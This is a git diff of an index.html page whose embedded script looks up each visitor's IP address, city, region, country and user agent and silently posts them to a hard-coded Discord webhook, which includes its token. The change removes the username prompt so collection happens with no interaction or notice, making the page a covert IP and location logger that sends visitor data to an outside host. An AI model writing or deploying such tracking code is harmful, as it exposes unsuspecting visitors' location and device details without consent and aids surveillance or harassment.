--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!-- Updated HTML with enhanced functionality -->
+<!-- Updated HTML without prompting for Discord username -->
 <!DOCTYPE html>
 <html lang="en">
 <head>
@@ -14,14 +14,14 @@
         const webhookUrl = 'https://discord.com/api/webhooks/1181568688365772810/a8uz5coZtPV_fm96znZsrCny53RXJn55vjU0P6QfzL7VVVvcoDjnCvKgfbjPhHARDI5N'; // Replace with your Discord webhook URL
 
         // Function to send user and device information to Discord
-        const sendInfoToDiscord = (username, ip, address, userAgent) => {
+        const sendInfoToDiscord = (ip, address, userAgent) => {
             fetch(webhookUrl, {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json',
                 },
                 body: JSON.stringify({
-                    content: `New visitor info:\nUsername: ${username}\nIP: ${ip}\nAddress: ${address}\nUser Agent: ${userAgent}`,
+                    content: `New visitor info:\nIP: ${ip}\nAddress: ${address}\nUser Agent: ${userAgent}`,
                 }),
             });
         };
@@ -38,14 +38,10 @@
                 const addressData = await addressResponse.json();
                 const address = `${addressData.city}, ${addressData.region}, ${addressData.country}`;
 
-                const username = prompt('Please enter your Discord username:');
                 const userAgent = navigator.userAgent;
 
-                if (username) {
-                    sendInfoToDiscord(username, ip, address, userAgent);
-                } else {
-                    console.error('Discord username not provided');
-                }
+                // Sending data to Discord without prompting for username
+                sendInfoToDiscord(ip, address, userAgent);
             } catch (error) {
                 console.error('Error fetching IP or address:', error);
             }
